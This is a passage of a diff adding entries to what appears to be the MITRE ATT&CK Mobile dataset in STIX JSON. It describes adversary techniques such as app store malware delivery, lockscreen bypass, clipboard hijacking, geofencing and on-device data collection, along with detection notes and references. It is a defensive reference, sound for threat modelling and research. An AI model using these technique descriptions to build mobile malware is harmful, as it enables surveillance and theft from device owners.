+ }, + { + "source_name": "Wang", + "url": "https://www.usenix.org/conference/usenixsecurity13/technical-sessions/presentation/wang_tielei", + "description": "Tielei Wang, Kangjie Lu, Long Lu, Simon Chung, and Wenke Lee. (2013, August). Jekyll on iOS: When Benign Apps Become Evil. Retrieved December 9, 2016." + }, + { + "url": "https://pages.nist.gov/mobile-threat-catalogue/ecosystem-threats/ECO-4.html", + "source_name": "NIST Mobile Threat Catalogue", + "external_id": "ECO-4" + }, + { + "url": "https://pages.nist.gov/mobile-threat-catalogue/ecosystem-threats/ECO-16.html", + "source_name": "NIST Mobile Threat Catalogue", + "external_id": "ECO-16" + }, + { + "url": "https://pages.nist.gov/mobile-threat-catalogue/ecosystem-threats/ECO-17.html", + "source_name": "NIST Mobile Threat Catalogue", + "external_id": "ECO-17" + }, + { + "url": "https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-20.html", + "source_name": "NIST Mobile Threat Catalogue", + "external_id": "APP-20" + }, + { + "url": "https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-21.html", + "source_name": "NIST Mobile Threat Catalogue", + "external_id": "APP-21" + }, + { + "url": "https://pages.nist.gov/mobile-threat-catalogue/ecosystem-threats/ECO-22.html", + "source_name": "NIST Mobile Threat Catalogue", + "external_id": "ECO-22" + } + ], + "x_mitre_deprecated": true, + "revoked": false, + "description": "Malicious applications are a common attack vector used by adversaries to gain a presence on mobile devices. Mobile devices often are configured to allow application installation only from an authorized app store (e.g., Google Play Store or Apple App Store). An adversary may seek to place a malicious application in an authorized app store, enabling the application to be installed onto targeted devices.\n\nApp stores typically require developer registration and use vetting techniques to identify malicious applications. 
Adversaries may use these techniques against app store defenses:\n\n* [Download New Code at Runtime](https://attack.mitre.org/techniques/T1407)\n* [Obfuscated Files or Information](https://attack.mitre.org/techniques/T1406)\n\nAdversaries may also seek to evade vetting by placing code in a malicious application to detect whether it is running in an app analysis environment and, if so, avoid performing malicious actions while under analysis. (Citation: Petsas) (Citation: Oberheide-Bouncer) (Citation: Percoco-Bouncer) (Citation: Wang)\n\nAdversaries may also use fake identities, payment cards, etc., to create developer accounts to publish malicious applications to app stores. (Citation: Oberheide-Bouncer)\n\nAdversaries may also use control of a target's Google account to use the Google Play Store's remote installation capability to install apps onto the Android devices associated with the Google account. (Citation: Oberheide-RemoteInstall) (Citation: Konoth) (Only applications that are available for download through the Google Play Store can be remotely installed using this technique.)", + "modified": "2022-04-06T15:41:33.827Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Deliver Malicious App via Authorized App Store", + "x_mitre_detection": "* An EMM/MDM or mobile threat defense solution can identify the presence of unwanted or known insecure or malicious apps on devices.\n* Developers can scan (or have a third party scan on their behalf) the app stores for presence of unauthorized apps that were submitted using the developer's identity.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "initial-access" + } + ], + "x_mitre_is_subtechnique": false, + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2023-03-20T15:55:09.397Z", + 
"name": "Data Encrypted for Impact", + "description": "An adversary may encrypt files stored on a mobile device to prevent the user from accessing them. This may be done in order to extract monetary compensation from a victim in exchange for decryption or a decryption key (ransomware) or to render data permanently inaccessible in cases where the key is not saved or transmitted.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "impact" + } + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Application vetting services may be able to detect if an application attempts to encrypt files, although this may be benign behavior.", + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_version": "3.2", + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "type": "attack-pattern", + "id": "attack-pattern--d9e88203-2b5d-405f-a406-2933b1e3d7e4", + "created": "2017-10-25T14:48:10.285Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1471", + "external_id": "T1471" + }, + { + "source_name": "NIST Mobile Threat Catalogue", + "url": "https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-28.html", + "external_id": "APP-28" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2023-03-20T18:54:36.502Z", + "name": "Prevent Application Removal", + "description": "Adversaries may abuse the Android device administration API to prevent the user from uninstalling a target application. 
In earlier versions of Android, device administrator applications needed their administration capabilities explicitly deactivated by the user before the application could be uninstalled. This was later updated so the user could deactivate and uninstall the administrator application in one step.\n\nAdversaries may also abuse the device accessibility APIs to prevent removal. This set of APIs allows the application to perform certain actions on behalf of the user and programmatically determine what is being shown on the screen. The malicious application could monitor the device screen for certain modals (e.g., the confirmation modal to uninstall an application) and inject screen input or a back button tap to close the modal.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "defense-evasion" + } + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Users can view a list of device administrators and applications that have registered accessibility services in device settings. Users can typically visually see when an action happens that they did not initiate and can subsequently review installed applications for any out of place or unknown ones. 
Applications that register an accessibility service or request device administrator permissions should be scrutinized further for malicious behavior.", + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_version": "1.1", + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "type": "attack-pattern", + "id": "attack-pattern--dc01774a-d1c1-45fb-b506-0a5d1d6593d9", + "created": "2022-04-01T18:44:32.808Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1629/001", + "external_id": "T1629.001" + }, + { + "source_name": "NIST Mobile Threat Catalogue", + "url": "https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-22.html", + "external_id": "APP-22" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "id": "attack-pattern--dd818ea5-adf5-41c7-93b5-f3b839a219fb", + "created": "2017-10-25T14:48:33.574Z", + "x_mitre_version": "2.1", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1421", + "url": "https://attack.mitre.org/techniques/T1421" + } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "Adversaries may attempt to get a listing of network connections to or from the compromised device they are currently accessing or from remote systems by querying for information over the network. 
\n\n \n\nThis is typically accomplished by utilizing device APIs to collect information about nearby networks, such as Wi-Fi, Bluetooth, and cellular tower connections. On Android, this can be done by querying the respective APIs: \n\n \n\n* `WifiInfo` for information about the current Wi-Fi connection, as well as nearby Wi-Fi networks. Querying the `WiFiInfo` API requires the application to hold the `ACCESS_FINE_LOCATION` permission. \n\n* `BluetoothAdapter` for information about Bluetooth devices, which also requires the application to hold several permissions granted by the user at runtime. \n\n* For Android versions prior to Q, applications can use the `TelephonyManager.getNeighboringCellInfo()` method. For Q and later, applications can use the `TelephonyManager.getAllCellInfo()` method. Both methods require the application hold the `ACCESS_FINE_LOCATION` permission.", + "modified": "2022-03-31T16:31:12.821Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "System Network Connections Discovery", + "x_mitre_detection": "System Network Connections Discovery can be difficult to detect, and therefore enterprises may be better served focusing on detection at other stages of adversarial behavior.", + "kill_chain_phases": [ + { + "phase_name": "discovery", + "kill_chain_name": "mitre-mobile-attack" + } + ], + "x_mitre_is_subtechnique": false, + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "x_mitre_platforms": [ + "Android", + "iOS" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "id": "attack-pattern--dfe29258-ce59-421c-9dee-e85cb9fa90cd", + "created": "2017-10-25T14:48:24.488Z", + "x_mitre_version": "1.2", + "external_references": [ + { + "source_name": 
"mitre-attack", + "external_id": "T1461", + "url": "https://attack.mitre.org/techniques/T1461" + }, + { + "source_name": "Wired-AndroidBypass", + "url": "https://www.wired.com/2015/09/hack-brief-new-emergency-number-hack-easily-bypasses-android-lock-screens/", + "description": "Andy Greenberg. (2015, September 15). Hack Brief: Emergency Number Hack Bypasses Android Lock Screens. Retrieved December 23, 2016." + }, + { + "source_name": "Kaspersky-iOSBypass", + "url": "https://threatpost.com/ios-10-passcode-bypass-can-access-photos-contacts/122033/", + "description": "Chris Brook. (2016, November 17). iOS 10 Passcode Bypass Can Access Photos, Contacts. Retrieved December 23, 2016." + }, + { + "source_name": "TheSun-FaceID", + "url": "https://www.thesun.co.uk/tech/5584082/iphone-x-face-unlock-tricked-broken/", + "description": "Sean Keach. (2018, February 15). Brit mates BREAK Apple’s face unlock and vow to never buy iPhone again. Retrieved September 18, 2018." + }, + { + "source_name": "SRLabs-Fingerprint", + "url": "https://srlabs.de/bites/spoofing-fingerprints/", + "description": "SRLabs. (n.d.). Fingerprints are not fit for secure device unlocking. Retrieved December 23, 2016." + } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "An adversary with physical access to a mobile device may seek to bypass the device’s lockscreen. Several methods exist to accomplish this, including:\n\n* Biometric spoofing: If biometric authentication is used, an adversary could attempt to spoof a mobile device’s biometric authentication mechanism. 
Both iOS and Android partly mitigate this attack by requiring the device’s passcode rather than biometrics to unlock the device after every device restart, and after a set or random amount of time.(Citation: SRLabs-Fingerprint)(Citation: TheSun-FaceID)\n* Unlock code bypass: An adversaries could attempt to brute-force or otherwise guess the lockscreen passcode (typically a PIN or password), including physically observing (“shoulder surfing”) the device owner’s use of the lockscreen passcode. Mobile OS vendors partly mitigate this by implementing incremental backoff timers after a set number of failed unlock attempts, as well as a configurable full device wipe after several failed unlock attempts.\n* Vulnerability exploit: Techniques have been periodically demonstrated that exploit mobile devices to bypass the lockscreen. The vulnerabilities are generally patched by the device or OS vendor once disclosed.(Citation: Wired-AndroidBypass)(Citation: Kaspersky-iOSBypass)\n", + "modified": "2022-04-19T15:36:12.312Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Lockscreen Bypass", + "x_mitre_detection": "Users can see if someone is watching them type in their device passcode.", + "kill_chain_phases": [ + { + "phase_name": "initial-access", + "kill_chain_name": "mitre-mobile-attack" + } + ], + "x_mitre_is_subtechnique": false, + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "x_mitre_platforms": [ + "Android", + "iOS" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "id": "attack-pattern--e083305c-49e7-4c87-aae8-9689213bffbe", + "created": "2020-12-16T20:16:07.673Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "mitre-attack", + 
"external_id": "T1605", + "url": "https://attack.mitre.org/techniques/T1605" + } + ], + "x_mitre_deprecated": false, + "revoked": true, + "description": "Adversaries may use built-in command-line interfaces to interact with the device and execute commands. Android provides a bash shell that can be interacted with over the Android Debug Bridge (ADB) or programmatically using Java’s `Runtime` package. On iOS, adversaries can interact with the underlying runtime shell if the device has been jailbroken.\n\nIf the device has been rooted or jailbroken, adversaries may locate and invoke a superuser binary to elevate their privileges and interact with the system as the root user. This dangerous level of permissions allows the adversary to run special commands and modify protected system files.", + "modified": "2022-03-30T14:00:45.099Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Command-Line Interface", + "x_mitre_detection": "Command-Line Interface execution can be difficult to detect, and therefore enterprises may be better served focusing on detection at other stages of adversarial behavior.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "execution" + } + ], + "x_mitre_is_subtechnique": false, + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2023-03-20T15:40:11.937Z", + "name": "Contact List", + "description": "Adversaries may utilize standard operating system APIs to gather contact list data. On Android, this can be accomplished using the Contacts Content Provider. On iOS, this can be accomplished using the `Contacts` framework. \n\n \n\nIf the device has been jailbroken or rooted, an adversary may be able to access the [Contact List](https://attack.mitre.org/techniques/T1636/003) without the user’s knowledge or approval. 
", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "collection" + } + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "On both Android and iOS, the user can manage which applications have permission to access the contact list through the device settings screen, revoking the permission if necessary. Application vetting services could look for `android.permission.READ_CONTACTS` in an Android application’s manifest, or `NSContactsUsageDescription` in an iOS application’s `Info.plist` file. Most applications do not need contact list access, so extra scrutiny could be applied to those that request it.", + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_platforms": [ + "iOS", + "Android" + ], + "x_mitre_version": "1.1", + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "type": "attack-pattern", + "id": "attack-pattern--e0b9ecb8-a7d1-43c7-aa30-8e19c6a92c86", + "created": "2022-04-01T13:17:52.740Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1636/003", + "external_id": "T1636.003" + }, + { + "source_name": "NIST Mobile Threat Catalogue", + "url": "https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-13.html", + "external_id": "APP-13" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "x_mitre_platforms": [ + "Android", + "iOS" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "id": "attack-pattern--e1c912a9-e305-434b-9172-8a6ce3ec9c4a", + "created": "2019-10-10T15:12:42.790Z", + 
"x_mitre_version": "1.1", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1533", + "url": "https://attack.mitre.org/techniques/T1533" + }, + { + "url": "https://pages.nist.gov/mobile-threat-catalogue/stack-threats/STA-41.html", + "source_name": "NIST Mobile Threat Catalogue", + "external_id": "STA-41" + } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "Adversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to exfiltration. \n\n \n\nAccess to local system data, which includes information stored by the operating system, often requires escalated privileges. Examples of local system data include authentication tokens, the device keyboard cache, Wi-Fi passwords, and photos. On Android, adversaries may also attempt to access files from external storage which may require additional storage-related permissions. \n\n ", + "modified": "2022-04-01T16:53:27.576Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Data from Local System", + "x_mitre_detection": "Accessing data from the local system can be difficult to detect, and therefore enterprises may be better served focusing on detection at other stages of adversarial behavior.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "collection" + } + ], + "x_mitre_is_subtechnique": false, + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2023-03-15T16:34:51.917Z", + "name": "Account Access Removal", + "description": "Adversaries may interrupt availability of system and network resources by inhibiting access to accounts utilized by legitimate users. Accounts may be deleted, locked, or manipulated (ex: credentials changed) to remove access to accounts. 
", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "impact" + } + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Application vetting services could closely scrutinize applications that request Device Administrator permissions.", + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_version": "1.1", + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "type": "attack-pattern", + "id": "attack-pattern--e2c2249a-eb82-4614-8dd4-9c514dde65e2", + "created": "2022-04-06T13:29:47.590Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1640", + "external_id": "T1640" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "x_mitre_platforms": [ + "Android", + "iOS" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "id": "attack-pattern--e2ea7f6b-8d4f-49c3-819d-660530d12b77", + "created": "2017-10-25T14:48:19.265Z", + "x_mitre_version": "1.2", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1426", + "url": "https://attack.mitre.org/techniques/T1426" + }, + { + "source_name": "Android-Build", + "url": "https://developer.android.com/reference/android/os/Build", + "description": "Android. (n.d.). Build. Retrieved December 21, 2016." 
+ }, + { + "url": "https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-12.html", + "source_name": "NIST Mobile Threat Catalogue", + "external_id": "APP-12" + } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "Adversaries may attempt to get detailed information about a device’s operating system and hardware, including versions, patches, and architecture. Adversaries may use the information from [System Information Discovery](https://attack.mitre.org/techniques/T1426) during automated discovery to shape follow-on behaviors, including whether or not to fully infects the target and/or attempts specific actions. \n\n \n\nOn Android, much of this information is programmatically accessible to applications through the `android.os.Build` class. (Citation: Android-Build) iOS is much more restrictive with what information is visible to applications. Typically, applications will only be able to query the device model and which version of iOS it is running. 
", + "modified": "2022-04-11T19:21:34.776Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "System Information Discovery", + "x_mitre_detection": "System information discovery can be difficult to detect, and therefore enterprises may be better served focusing on detection at other stages of adversarial behavior.", + "kill_chain_phases": [ + { + "phase_name": "discovery", + "kill_chain_name": "mitre-mobile-attack" + } + ], + "x_mitre_is_subtechnique": false, + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "x_mitre_domains": [ + "mobile-attack" + ], + "id": "attack-pattern--e30cc912-7ea1-4683-9219-543b86cbdec9", + "type": "attack-pattern", + "created": "2017-10-25T14:48:28.786Z", + "revoked": true, + "external_references": [ + { + "source_name": "mitre-mobile-attack", + "url": "https://attack.mitre.org/techniques/T1442", + "external_id": "T1442" + } + ], + "modified": "2018-10-17T01:05:10.701Z", + "name": "Fake Developer Accounts", + "x_mitre_version": "1.0", + "x_mitre_is_subtechnique": false + }, + { + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "id": "attack-pattern--e399430e-30b7-48c5-b70a-f44dc8c175cb", + "created": "2019-07-26T14:15:31.451Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1510", + "url": "https://attack.mitre.org/techniques/T1510" + }, + { + "source_name": "Android 10 Privacy Changes", + "url": "https://developer.android.com/about/versions/10/privacy/changes#clipboard-data", + "description": "Android Developers. (n.d.). Privacy changes in Android 10. Retrieved September 11, 2019." 
+ }, + { + "source_name": "Dr.Webb Clipboard Modification origin August 2018", + "url": "https://vms.drweb.com/virus/?i=17517750", + "description": "Dr.Webb. (2018, August 8). Android.Clipper.1.origin. Retrieved July 26, 2019." + }, + { + "source_name": "Dr.Webb Clipboard Modification origin2 August 2018", + "url": "https://vms.drweb.com/virus/?i=17517761", + "description": "Dr.Webb. (2018, August 8). Android.Clipper.2.origin. Retrieved July 26, 2019." + }, + { + "source_name": "ESET Clipboard Modification February 2019", + "url": "https://www.eset.com/uk/about/newsroom/press-releases/first-clipper-malware-discovered-on-google-play-1/", + "description": "ESET. (2019, February 11). First clipper malware discovered on Google Play.. Retrieved July 26, 2019." + }, + { + "source_name": "Welivesecurity Clipboard Modification February 2019", + "url": "https://www.welivesecurity.com/2019/02/08/first-clipper-malware-google-play/", + "description": "Lukáš Štefanko. (2019, February 8). First clipper malware discovered on Google Play. Retrieved July 26, 2019." + }, + { + "source_name": "Syracuse Clipboard Modification 2014", + "url": "http://www.cis.syr.edu/~wedu/Research/paper/clipboard_attack_dimva2014.pdf", + "description": "Zhang, X; Du, W. (2014, January). Attacks on Android Clipboard. Retrieved July 26, 2019." 
+ } + ], + "x_mitre_deprecated": false, + "revoked": true, + "description": "Adversaries may abuse clipboard functionality to intercept and replace information in the Android device clipboard.(Citation: ESET Clipboard Modification February 2019)(Citation: Welivesecurity Clipboard Modification February 2019)(Citation: Syracuse Clipboard Modification 2014) Malicious applications may monitor the clipboard activity through the ClipboardManager.OnPrimaryClipChangedListener interface on Android to determine when the clipboard contents have changed.(Citation: Dr.Webb Clipboard Modification origin2 August 2018)(Citation: Dr.Webb Clipboard Modification origin August 2018) Listening to clipboard activity, reading the clipboard contents, and modifying the clipboard contents requires no explicit application permissions and can be performed by applications running in the background, however, this behavior has changed with the release of Android 10.(Citation: Android 10 Privacy Changes)\n\nAdversaries may use [Clipboard Modification](https://attack.mitre.org/techniques/T1510) to replace text prior to being pasted, for example, replacing a copied Bitcoin wallet address with a wallet address that is under adversarial control.\n\n[Clipboard Modification](https://attack.mitre.org/techniques/T1510) had been seen within the Android/Clipper.C trojan. 
This sample had been detected by ESET in an application distributed through the Google Play Store targeting cryptocurrency wallet numbers.(Citation: ESET Clipboard Modification February 2019)", + "modified": "2022-04-06T13:41:17.512Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Clipboard Modification", + "x_mitre_detection": "Modifying clipboard content can be difficult to detect, and therefore enterprises may be better served focusing on detection at other stages of adversarial behavior.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "impact" + } + ], + "x_mitre_is_subtechnique": false, + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "x_mitre_platforms": [ + "Android", + "iOS" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "id": "attack-pattern--e3b936a4-6321-4172-9114-038a866362ec", + "created": "2019-10-10T15:00:44.181Z", + "x_mitre_version": "2.0", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1532", + "url": "https://attack.mitre.org/techniques/T1532" + } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "Adversaries may compress and/or encrypt data that is collected prior to exfiltration. Compressing data can help to obfuscate its contents and minimize use of network resources. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender. \n\n \n\nBoth compression and encryption are done prior to exfiltration, and can be performed using a utility, programming library, or custom algorithm. 
", + "modified": "2022-04-01T15:01:02.140Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Archive Collected Data", + "x_mitre_detection": "Many encryption mechanisms are built into standard application-accessible APIs and are therefore undetectable to the end user.", + "kill_chain_phases": [ + { + "phase_name": "collection", + "kill_chain_name": "mitre-mobile-attack" + } + ], + "x_mitre_is_subtechnique": false, + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2023-03-20T18:58:14.240Z", + "name": "Geofencing", + "description": "Adversaries may use a device’s geographical location to limit certain malicious behaviors. For example, malware operators may limit the distribution of a second stage payload to certain geographic regions.(Citation: Lookout eSurv)\n\n[Geofencing](https://attack.mitre.org/techniques/T1627/001) is accomplished by persuading the user to grant the application permission to access location services. The application can then collect, process, and exfiltrate the device’s location to perform location-based actions, such as ceasing malicious behavior or showing region-specific advertisements. \n\nOne method to accomplish [Geofencing](https://attack.mitre.org/techniques/T1627/001) on Android is to use the built-in Geofencing API to automatically trigger certain behaviors when the device enters or exits a specified radius around a geographical location. Similar to other [Geofencing](https://attack.mitre.org/techniques/T1627/001) methods, this requires that the user has granted the `ACCESS_FINE_LOCATION` and `ACCESS_BACKGROUND_LOCATION` permissions. The latter is only required if the application targets Android 10 (API level 29) or higher. 
However, Android 11 introduced additional permission controls that may restrict background location collection based on user permission choices at runtime. These additional controls include \"Allow only while using the app\", which will effectively prohibit background location collection. \n\nSimilarly, on iOS, developers can use built-in APIs to setup and execute geofencing. Depending on the use case, the app will either need to call `requestWhenInUseAuthorization()` or `requestAlwaysAuthorization()`, depending on when access to the location services is required. Similar to Android, users also have the option to limit when the application can access the device’s location, including one-time use and only when the application is running in the foreground. \n\n[Geofencing](https://attack.mitre.org/techniques/T1627/001) can be used to prevent exposure of capabilities in environments that are not intended to be compromised or operated within. For example, location data could be used to limit malware spread and/or capabilities, which could also potentially evade application analysis environments (ex: malware analysis outside of the target geographic area). Other malicious usages could include showing language-specific input prompts and/or advertisements.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "defense-evasion" + } + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Users can review which applications have location permissions in the operating system’s settings menu. On Android 10 and later, the system shows a notification to the user when an app has been accessing device location in the background. 
Application vetting services can detect unnecessary and potentially abused location permissions or API calls.", + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_platforms": [ + "Android", + "iOS" + ], + "x_mitre_version": "1.1", + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "type": "attack-pattern", + "id": "attack-pattern--e422b6fa-4739-46b9-992e-82f1b350c780", + "created": "2022-03-30T20:36:03.177Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1627/001", + "external_id": "T1627.001" + }, + { + "source_name": "Lookout eSurv", + "description": "A. Bauer. (2019, April 8). Lookout discovers phishing sites distributing new iOS and Android surveillanceware. Retrieved September 11, 2020.", + "url": "https://blog.lookout.com/esurv-research" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "id": "attack-pattern--e4c347e9-fb91-4bc5-83b8-391e389131e2", + "created": "2019-07-10T15:18:16.753Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1507", + "url": "https://attack.mitre.org/techniques/T1507" + } + ], + "x_mitre_deprecated": false, + "revoked": true, + "description": "Adversaries may use device sensors to collect information about nearby networks, such as Wi-Fi and Bluetooth.", + "modified": "2022-03-31T16:33:55.068Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": 
